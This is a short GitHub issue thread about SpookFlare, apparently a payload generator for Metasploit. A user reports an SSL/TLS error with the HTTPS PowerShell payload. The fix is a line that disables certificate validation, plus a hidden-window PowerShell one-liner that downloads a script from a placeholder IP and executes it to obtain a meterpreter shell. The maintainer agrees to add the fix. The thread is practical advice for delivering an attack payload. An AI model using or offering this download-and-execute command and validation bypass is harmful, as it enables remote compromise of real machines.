### ISSUE TITLE
SSL/TLS Negotiation Error with Powershell Payload and MSF - FIX/WORKAROUND

### ISSUE THREAD

**Issue by H011YxW00D** [hlldz/SpookFlare#12]
So this is a great project! So currently the https ps1 payload will give you the following error: Exception calling "DownloadFile" with "2" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."

You can get around this by placing the following code at the top of the ps1 output file generated by spookflare:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}

Once you do that you can just call the file from a cmd prompt like so and get your https meterpreter shell: powershell -w 1 -c "iwr('http://x.x.x.x/PS1-OUTPUT.txt')|iex"

Cheers!

**Comment by hlldz** [comment]
Thank you! C # based binary payloads have this property but I forgot for PowerShell payloads. I'll add it to the update.
